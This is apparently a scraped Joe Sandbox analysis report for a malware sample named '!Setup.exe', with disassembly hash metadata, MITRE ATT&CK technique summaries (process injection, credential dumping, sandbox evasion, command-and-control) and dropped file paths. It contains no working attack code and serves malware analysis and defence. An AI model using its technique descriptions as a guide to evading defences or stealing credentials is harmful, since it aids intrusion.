Instruction Fuzzy Hash: 09411874A006458FCB0ACF58D494EAEFBB1FF48310B158299D915AB364C736FE51CBA4

Function 00CC3400 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2646313521.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7f3355ce0e19a0fdc09e26fbed8fdcbdc4f26ce89d1d5ad3d71aaf1c94b6fab
Instruction ID: e514fab7c001a540c2887a7254998ad61a32f1e1846e9de84e70f2ef27ea42fa
Opcode Fuzzy Hash: f7f3355ce0e19a0fdc09e26fbed8fdcbdc4f26ce89d1d5ad3d71aaf1c94b6fab
Instruction Fuzzy Hash: F04117B4A006059FCB09CF58D494EAEFBB1FF48310B1582A9D915AB364C736FE51CBA4

Function 00CC2A61 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2646313521.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a97602173eb42d2b30bb46f7e5e206c25159457383e6ab4aa340588b0dcb80
Instruction ID: b7aa2f131b08aa9584ea630183d5422cfa807199947ba3c8aaff7948efc89752
Opcode Fuzzy Hash: 42a97602173eb42d2b30bb46f7e5e206c25159457383e6ab4aa340588b0dcb80
Instruction Fuzzy Hash: 36317275A097959FCB02CF98C8909A9FFB1FF4A310B19419AE448EB352C335ED45CBA1

Function 00CC2AB0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2646313521.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e524631c473e43a64e9d4a5b4f61d6d302b09b98d5dcf4c4323c217a9316ffcf
Instruction ID: 53c5c0280d5dcaa2f6efc6ab8bce5b7c98bebc12bc87609d937048204f8476b0
Opcode Fuzzy Hash: e524631c473e43a64e9d4a5b4f61d6d302b09b98d5dcf4c4323c217a9316ffcf
Instruction Fuzzy Hash: D3211974A046099FCB01CF98C894AAEFBB1FF49310B1585AAD519EB351C735EC41CBA0

Function 00CC50D9 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2646313521.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 792694aaaef7596a2fb1a6d094729b62483cb97db08d3d400cd0334a42fcf06d
Instruction ID: 31cb4e537f749298f52357450e48e3f9c4ff6b27bd85f941422dc768c9514dcf
Opcode Fuzzy Hash: 792694aaaef7596a2fb1a6d094729b62483cb97db08d3d400cd0334a42fcf06d
Instruction Fuzzy Hash: CD213474A006069FCB04DB49C494EAAFBB5FB88310B1981A9D918EB351C731FD82CBA0

Function 00CC48F0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2646313521.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92cee71197b684b37515ab65da999ed36613937ed34a9e7a2c38fe3b33ed6531
Instruction ID: eb362c87a8fc18a7cccb933245d7063ad02864769c8696fec98b89d27203cef7
Opcode Fuzzy Hash: 92cee71197b684b37515ab65da999ed36613937ed34a9e7a2c38fe3b33ed6531
Instruction Fuzzy Hash: D1212974A0021A8FCB04CF99D891DAEFBF5FF89310B1581A9E959AB351C335ED41CBA1

Function 00C2D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2646060764.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_c2d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2d561dab8e0063902697ca21d5246303e4acd19a75f363a9cab21a0d3a84ce
Instruction ID: 64cea2ca839feb74ba5ef5c56785e62a20d34852f942fdc6ae62d13667d58930
Opcode Fuzzy Hash: 2b2d561dab8e0063902697ca21d5246303e4acd19a75f363a9cab21a0d3a84ce
Instruction Fuzzy Hash: ED015E6140E3C09ED7128B259C94B56BFB4DF53224F1DC0DBD8988F2A3D2695C49C772

Function 00C2D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2646060764.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_c2d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7255ce8e88853a551b228dc8cdb9af2baa6eae08f4bacf32bcd916c3d418bdc0
Instruction ID: 9075b17e4a7301b5501ff952ba8a0cfd7195089fd91784ce3f435a8ccc4a6e48
Opcode Fuzzy Hash: 7255ce8e88853a551b228dc8cdb9af2baa6eae08f4bacf32bcd916c3d418bdc0
Instruction Fuzzy Hash: CA0126714083509AE7108E2AECC4B67BF98DF65360F28C41AEC5A4B692C7789D45C6B1

Non-executed Functions

Function 074708A0 Relevance: 9.1, Strings: 7, Instructions: 322COMMON

Download Yara Rule

Strings

$cq, xrefs: 07470A82
tPcq, xrefs: 07470AF9
$cq, xrefs: 07470AA8
tPcq, xrefs: 07470AED
4'cq, xrefs: 074709A2
4'cq, xrefs: 074709AE
$cq, xrefs: 07470AB4

Memory Dump Source

Source File: 00000010.00000002.2651772685.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7470000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq$tPcq$tPcq$$cq$$cq$$cq
API String ID: 0-4181668518
Opcode ID: 2f0d1d1b1a3a74dae9423979c20d9aa91a8dcc7cd690bda40244537047e12c23
Instruction ID: 122b8c14520eb58b7272365da57579aeeb06a341fdaf1ac73b99d4fb3e656965
Opcode Fuzzy Hash: 2f0d1d1b1a3a74dae9423979c20d9aa91a8dcc7cd690bda40244537047e12c23
Instruction Fuzzy Hash: BEA135B27053169FDB158AA994013FBBBF6AFC6220F14846BD545CB3A2DB31CC51C7A1

Function 074714E8 Relevance: 6.4, Strings: 5, Instructions: 191COMMON

Download Yara Rule

Strings

$cq, xrefs: 0747169A
$cq, xrefs: 0747166F
4'cq, xrefs: 0747159E
$cq, xrefs: 074716A6
4'cq, xrefs: 07471592

Memory Dump Source

Source File: 00000010.00000002.2651772685.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7470000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq$$cq$$cq$$cq
API String ID: 0-838516036
Opcode ID: c85c5f114bc9492f640439816adc66c02dafb0d9a0d45d18d3b1f6e90085bc05
Instruction ID: 9e5d86e872bb68ce006ad58b38d5f87753dcaa91114f9ec061274e511f1b9749
Opcode Fuzzy Hash: c85c5f114bc9492f640439816adc66c02dafb0d9a0d45d18d3b1f6e90085bc05
Instruction Fuzzy Hash: 955138B2B1030E9FCB255A6D88017E7BBB6AFC6211F29C46BD446CB341DA31C856C7A1

Function 07473518 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$cq, xrefs: 07473546
$cq, xrefs: 07473580
$cq, xrefs: 0747352A
$cq, xrefs: 07473574

Memory Dump Source

Source File: 00000010.00000002.2651772685.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7470000_powershell.jbxd

Similarity

API ID:
String ID: $cq$$cq$$cq$$cq
API String ID: 0-2876200767
Opcode ID: e53ee4258d0b55ff8eb8ff8a4ad7fd89978120738c2bf77f4e1814b85065e9d2
Instruction ID: c2073ee6fa0b955bfe8ecc704b14249fd5888e60d50404c3ce22d16aeb9fc4ce
Opcode Fuzzy Hash: e53ee4258d0b55ff8eb8ff8a4ad7fd89978120738c2bf77f4e1814b85065e9d2
Instruction Fuzzy Hash: A52135B13103825BDB245D6E98017E7AEDA9BC0310FA5883BE549CB382DE35D841D361

Function 07470570 Relevance: 5.1, Strings: 4, Instructions: 55COMMON

Download Yara Rule

Strings

4'cq, xrefs: 074705DB
4'cq, xrefs: 074705E7
$cq, xrefs: 074705C6
$cq, xrefs: 074705BA

Memory Dump Source

Source File: 00000010.00000002.2651772685.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7470000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq$$cq$$cq
API String ID: 0-1126079151
Opcode ID: b2e174ea3ac3371b8c14b96f8a4ed2cf40ba83635fb6984d19d485e96d850007
Instruction ID: 93f904af77bcfbc848254d2870dbb7ac3b76d702f4d0ad07fcd0e97faa3efd89
Opcode Fuzzy Hash: b2e174ea3ac3371b8c14b96f8a4ed2cf40ba83635fb6984d19d485e96d850007
Instruction Fuzzy Hash: 7B01D6A171A3865FCB26522818211E66BB3ABD26603AB009BD581DB3D3CD25CD56C3A7

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report !Setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\243714\L

C:\Users\user\AppData\Local\Temp\243714\Publisher.com

C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe

C:\Users\user\AppData\Local\Temp\Abilities

C:\Users\user\AppData\Local\Temp\Amend

C:\Users\user\AppData\Local\Temp\Applied

C:\Users\user\AppData\Local\Temp\Approved

C:\Users\user\AppData\Local\Temp\Automatically

C:\Users\user\AppData\Local\Temp\Banks

C:\Users\user\AppData\Local\Temp\Breaking

C:\Users\user\AppData\Local\Temp\Convenient

C:\Users\user\AppData\Local\Temp\Directors

C:\Users\user\AppData\Local\Temp\Documentary

C:\Users\user\AppData\Local\Temp\Gain

Windows Analysis Report
!Setup.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre